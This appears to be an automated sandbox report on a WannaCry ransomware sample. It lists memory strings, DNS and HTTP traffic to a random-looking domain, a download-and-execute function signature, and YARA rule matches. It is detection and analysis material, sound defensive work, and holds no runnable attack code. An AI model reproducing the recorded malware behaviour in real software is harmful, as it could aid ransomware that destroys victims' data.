              Source: backgroundTaskHost.exe, 00000024.00000000.586901114.000001D4264CC000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.448289508.000001D4264CC000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.520676657.000001D4264CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coP
              Source: backgroundTaskHost.exe, 00000024.00000000.526429902.000001D426A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/
              Source: backgroundTaskHost.exe, 00000024.00000000.544548518.000001D42671A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/q&
              Source: backgroundTaskHost.exe, 00000024.00000000.544548518.000001D42671A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/r&
              Source: backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106554&TID=700342084&CID=12800000000139270
              Source: backgroundTaskHost.exe, 00000024.00000000.520676657.000001D4264CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=12800000000139272
              Source: backgroundTaskHost.exe, 00000024.00000000.482278130.000001D424113000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425116123&TID=700333390&CID=12800000000162740
              Source: backgroundTaskHost.exe, 00000024.00000000.570400919.000001D424113000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.441177501.000001D4240CE000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.482278130.000001D424113000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425116219&TID=700333446&CID=12800000000162740
              Source: backgroundTaskHost.exe, 00000024.00000000.550171156.000001D426AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=
              Source: backgroundTaskHost.exe, 00000024.00000003.467785569.000001D425D1F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.459255678.000001D426750000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000003.468721919.000001D425DA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=
              Source: backgroundTaskHost.exe, 00000024.00000000.451616847.000001D4265F3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=
              Source: svchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 00000010.00000000.301346127.0000025CB5849000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.817831734.0000025CB59A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.304006105.0000025CB59A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.308802348.0000025CB59A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.810845760.0000025CB5849000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.306739907.0000025CB5849000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-US
              Source: svchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 00000014.00000003.325716393.000001C91F659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329272939.000001C91F65A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000014.00000003.325657488.000001C91F648000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329211076.000001C91F64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000014.00000003.325716393.000001C91F659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329272939.000001C91F65A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351767919.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342171336.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360438842.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365333804.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.356313484.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370609426.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347209738.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: backgroundTaskHost.exe, 00000024.00000000.557062800.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
              Source: backgroundTaskHost.exe, 00000024.00000000.557062800.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.locala
              Source: backgroundTaskHost.exe, 0000001C.00000000.370554204.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.356234041.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392348693.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387781701.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365252597.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.527484605.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383213238.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.341995914.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351629179.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347111414.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360350565.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378318070.0000019B7B628000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/profile.asmx
              Source: lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
              Source: backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000003.565308249.000001D426696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ris.a
              Source: backgroundTaskHost.exe, 00000024.00000000.562702503.000001D426A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ris.api.iris.micr
              Source: backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ris.api8.
              Source: backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ris.iris.mi
              Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store-images.s-micros
              Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.326573506.000001C91F613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000014.00000003.325657488.000001C91F648000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329211076.000001C91F64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bing.c
              Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bing.cpi/v
              Source: mssecsvc.exe, 00000006.00000002.361889160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kryptoslogic.com
              Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B927A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle,4_2_00B927A7
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: loaddll32.exe, 00000000.00000002.266401486.0000000000FAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Detected Wannacry Ransomware
              Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!29_2_004014A6
              Yara detected Wannacry ransomware
              Source: Yara matchFile source: FjYNZSPNkt.dll, type: SAMPLE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000000.263630110.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.267296098.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.266941602.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.261950970.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.274690512.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.272255673.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.384391046.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.278777531.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.265422211.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6408, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6440, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6580, type: MEMORYSTR
              Source: Yara matchFile source: C:\Windows\mssecsvc.exe, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: FjYNZSPNkt.dll, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: FjYNZSPNkt.dll, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
